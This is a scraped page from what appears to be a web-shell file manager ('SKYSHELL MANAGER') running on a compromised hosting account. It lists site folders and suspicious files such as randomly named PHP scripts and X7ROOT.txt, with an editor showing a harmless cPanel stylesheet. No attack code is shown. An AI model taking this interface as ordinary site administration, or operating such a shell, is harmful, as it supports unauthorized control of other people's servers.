📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: buttons.less
/* # buttons.less Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited */ @import (reference) "variables.less"; /* ------------------------------------------------------------------------------ */ /* Buttons /* ------------------------------------------------------------------------------ */ .btn { border-radius: @border-radius; } .btn-primary, .btn-default { cursor: pointer; overflow: hidden; transition: all 0.3s ease-out 0s; vertical-align: middle; z-index: 1; } .btn-primary { color: @btn-primary-color; text-align: center; background: @btn-primary-bg; border: 1px solid @btn-primary-border; cursor: pointer; box-shadow: 0 2px 5px 0 rgba(0, 0, 0, 0.16), 0 2px 10px 0 rgba(0, 0, 0, 0.12); } .btn-primary:focus { background-color: @btn-primary-focus-bg; color: @btn-primary-focus-color; } .btn-primary:hover { color: @btn-primary-hover-color; background-color: @btn-primary-hover-bg; box-shadow: 0 5px 11px 0 rgba(0, 0, 0, 0.18), 0 4px 15px 0 rgba(0, 0, 0, 0.15); } .btn-primary:active, .btn-primary.active { background-color: @btn-primary-active-bg; border-color: @btn-primary-active-border; box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125), 0 0 0 rgba(0, 0, 0, 0); } .btn-primary[disabled], .btn-primary[disabled]:hover, .btn-primary[disabled]:focus, .btn-primary[disabled]:active, .btn-primary[disabled].active { cursor: not-allowed; opacity: 0.65; color: @btn-primary-color; text-align: center; background: @btn-primary-bg; border: 1px solid @btn-primary-border; box-shadow: none; } .btn-default { color: @btn-default-color; text-align: center; background: @btn-default-bg; border: 1px solid @btn-default-border; cursor: pointer; box-shadow: 0 2px 5px 0 rgba(0, 0, 0, 0.16), 0 2px 10px 0 rgba(0, 0, 0, 0.12); } .btn-default:focus { background-color: @btn-default-active-bg; color: @btn-default-color; } .btn-default:hover { color: @btn-default-color; background-color: @btn-default-active-bg; box-shadow: 0 5px 11px 0 rgba(0, 0, 0, 0.1), 0 4px 15px 0 rgba(0, 0, 0, 0.1); } .btn-default:active, .btn-default.active { outline: none; background-color: @btn-default-active-bg; border-color: @btn-default-border; box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125), 0 0 0 rgba(0, 0, 0, 0); } .btn-default[disabled], .btn-default[disabled]:hover, .btn-default[disabled]:focus, .btn-default[disabled]:active, .btn-default[disabled].active { cursor: not-allowed; opacity: 0.65; color: @btn-default-color; text-align: center; background: @btn-default-bg; border: 1px solid @btn-default-border; box-shadow: none; } .btn.disabled, .btn[disabled], fieldset[disabled] .btn { pointer-events: inherit; } .btn-link[disabled], .btn-link[disabled]:hover, .btn-link[disabled]:focus { color: @btn-link-disabled-color; } .input-group-btn .btn-default, .input-group-btn .btn-primary, .btn-group .btn-default, .btn-group .btn-primary { box-shadow: none; border-width: 1px; --webkit-box-shadow: none; } /* ------------------------------------------------------------------------------ */ /* Button Loading Indicator /* ------------------------------------------------------------------------------ */ .btn-loading { position: relative; } .btn-loading .btn-label { visibility: hidden; display: inline-block; } .btn-loading-indicator { display: none; position: absolute; left: 50%; top: 50%; margin-left: -7px; margin-top: -7px; } .btn-loading .btn-loading-indicator { display: inline-block; } .btn-loading .btn-loading-indicator { -webkit-animation: spin 0.8s infinite linear; -moz-animation: spin 0.8s infinite linear; -o-animation: spin 0.8s infinite linear; animation: spin 0.8s infinite linear; } .btn-label { visibility: hidden; }
Save